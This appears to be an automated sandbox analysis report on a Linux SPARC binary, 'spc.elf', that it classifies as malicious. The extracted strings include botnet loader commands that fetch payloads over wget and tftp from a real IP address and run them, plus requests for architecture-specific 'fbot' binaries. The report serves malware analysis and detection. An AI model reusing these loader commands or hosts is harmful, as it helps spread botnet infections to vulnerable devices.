Source: spc.elf |
ReversingLabs: Detection: 39% |
Source: global traffic |
TCP traffic: 192.168.2.23:45598 -> 85.239.34.134:7685 |
Source: global traffic |
TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443 |
Source: global traffic |
TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443 |
Source: global traffic |
TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.42 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 85.239.34.134 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.43 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 109.202.202.202 |
Source: spc.elf |
String found in binary or memory: Cdh5GZtVWYhl2cuFGdz9mLsNWdAIiZh5GZtVWYhl2cuFGdz9mLsNWdAI2Zz9Ca0BGa0FGI0lWYpxWYg4mZtFWa5xGI0FHIoRSZuBXZ0hHIhRmYlxHI1NmcgUXagMXcpVXZAQhttps://www.youtube.ru/watch?v=OGp9P6QvMjYmb0V2dy9yai5Waid3bwRWZulmLvNQbAAABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789unknown./. equals www.youtube.com (Youtube) |
Source: spc.elf |
String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjY equals www.youtube.com (Youtube) |
Source: spc.elf |
String found in binary or memory: http://87.120.116.226 |
Source: spc.elf |
String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjY |
Source: spc.elf |
String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjYmb0V2dy9yai5Waid3bwRWZulmLvNQbAAABCDEFGHIJKLMNOPQRSTUVWXYZ |
Source: unknown |
Network traffic detected: HTTP traffic on port 43928 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 42836 -> 443 |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox TSUNAMI |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox cat /bin/busybox |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox KSLAKW; /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo |
Source: Initial sample |
String containing 'busybox' found: pdlbwairmoheqc18k5fgstv4jn072u63\x%02x/tmp//var//var/run//dev/arm5arm72bpdgbAAgOAA2cyVmbtFQZAAndkJndAMXYzN2dy9AZAA2YvNWd05iOhBHcsBXZgQmb09GIvZWdk5gPAAAJAAwIAAnYzVWevJAeAAXbsVGdtk2YsFAbAAGasVAcAAmbvNnclJ3YAQnbhZGbklWYslWZAQWZp5WZAQncvJgcAA2bk9nYllmYkFURGx2dldDdgoXYwBGb0VGIv5CdmB3buVAZAAGd0ZDcgoXYwBGb0VGIv5CdmB3buVAZAAURIN0TPRkTAUenablesystemshellshlinuxshell/bin/busybox TSUNAMI/bin/busybox cat /bin/busybox |
Source: Initial sample |
String containing 'busybox' found: >t && cd && >retrieve; >.t/bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox wget http:// |
Source: Initial sample |
String containing 'busybox' found: -O -> .t; /bin/busybox chmod 777 .t; ./.t |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox tftp -r |
Source: Initial sample |
String containing 'busybox' found: ; /bin/busybox chmod 777 .t; ./.t |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox echo -en ' |
Source: Initial sample |
String containing 'busybox' found: retrieve && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45' |
Source: Initial sample |
String containing 'busybox' found: ELFarmsparci686m68kpowerpcsuperhx86_64mipselmips/bin/busybox wget http://87.120.116.226 -O -> .t; /bin/busybox chmod 777 .t; ./.t/bin/busybox tftp -r -l .t -g ; /bin/busybox chmod 777 .t; ./.t/bin/busybox echo -en '' >> retrieve && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'./retrieve > .t && ./.t; >retrieve && >.t |
Source: Initial sample |
Potential command found: GET /fbot.arm5 HTTP/1.0 |
Source: Initial sample |
Potential command found: GET /fbot.arm7 HTTP/1.0 |
Source: Initial sample |
Potential command found: GET /fbot.x86 HTTP/1.0 |
Source: Initial sample |
Potential command found: GET /fbot.mips HTTP/1.0 |
Source: Initial sample |
Potential command found: GET /fbot.mipsel HTTP/1.0 |
Source: Initial sample |
Potential command found: GET /fbot.powerpc HTTP/1.0 |
Source: Initial sample |
Potential command found: GET /fbot.sparc HTTP/1.0 |
Source: Initial sample |
Potential command found: GET /fbot.sh4 HTTP/1.0 |
Source: ELF static info symbol of initial sample |
.symtab present: no |
Source: classification engine |
Classification label: mal48.linELF@0/0@0/0 |
Source: /usr/bin/dash (PID: 6222) |
Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.Alc5Eqx4Lp /tmp/tmp.LMNRnu9usF /tmp/tmp.qdWjTjRFP6 |
Source: /usr/bin/dash (PID: 6223) |
Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.Alc5Eqx4Lp /tmp/tmp.LMNRnu9usF /tmp/tmp.qdWjTjRFP6 |
Source: /tmp/spc.elf (PID: 6237) |
Queries kernel information via 'uname': |
Source: spc.elf, 6237.1.0000558398d97000.0000558398dfc000.rw-.sdmp |
Binary or memory string: /etc/qemu-binfmt/sparc |
Source: spc.elf, 6237.1.0000558398d97000.0000558398dfc000.rw-.sdmp |
Binary or memory string: U!/etc/qemu-binfmt/sparc |
Source: spc.elf, 6237.1.00007ffc32767000.00007ffc32788000.rw-.sdmp |
Binary or memory string: x86_64/usr/bin/qemu-sparc/tmp/spc.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/spc.elf |
Source: spc.elf, 6237.1.00007ffc32767000.00007ffc32788000.rw-.sdmp |
Binary or memory string: /usr/bin/qemu-sparc |